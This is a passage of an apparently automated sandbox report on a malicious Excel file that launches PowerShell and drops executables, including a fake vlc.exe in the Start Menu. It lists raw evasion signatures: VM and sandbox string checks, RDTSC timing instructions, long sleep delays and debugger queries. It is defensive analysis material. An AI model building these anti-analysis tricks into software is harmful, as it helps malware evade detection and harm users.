          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: 5901777.xlsStream path 'Workbook' entropy: 7.92744162749 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: oftmhayq.exe, 00000018.00000002.468670038.0000000002BC9000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\oftmhayq.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\oftmhayq.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409A90 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\oftmhayq.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\oftmhayq.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3864
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3310
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5124
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3318
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep count: 3864 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388Thread sleep count: 3310 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4244Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe TID: 5308Thread sleep count: 39 > 30
          Source: C:\Users\Public\oftmhayq.exe TID: 4472Thread sleep count: 63 > 30
          Source: C:\Users\Public\oftmhayq.exe TID: 2288Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\Public\oftmhayq.exe TID: 1012Thread sleep count: 34 > 30
          Source: C:\Users\Public\oftmhayq.exe TID: 6576Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 4020Thread sleep count: 59 > 30
          Source: C:\Users\Public\oftmhayq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\Public\oftmhayq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\splwow64.exeLast function: Thread delayed
          Source: C:\Windows\splwow64.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000001F.00000000.510806745.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000014.00000002.442866575.000001D222633000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
          Source: oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000001F.00000000.501168197.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000001F.00000000.515471921.000000000F6C0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&v
          Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000014.00000002.443094933.000001D222698000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\oftmhayq.exeProcess queried: DebugPort
          Source: C:\Users\Public\oftmhayq.exeProcess queried: DebugPort
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409A90 rdtsc
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3138 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139E962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8966 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391951 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D395E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D395E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013099BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130C9BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130C9BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013AF1B5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013AF1B5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139A189 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139A189 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D519E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D519E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8190 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FD1EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D31E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A89E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013919D8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EC1C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304020 mov edi, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01357016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01357016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01357016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FF86D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391843 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D7057 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
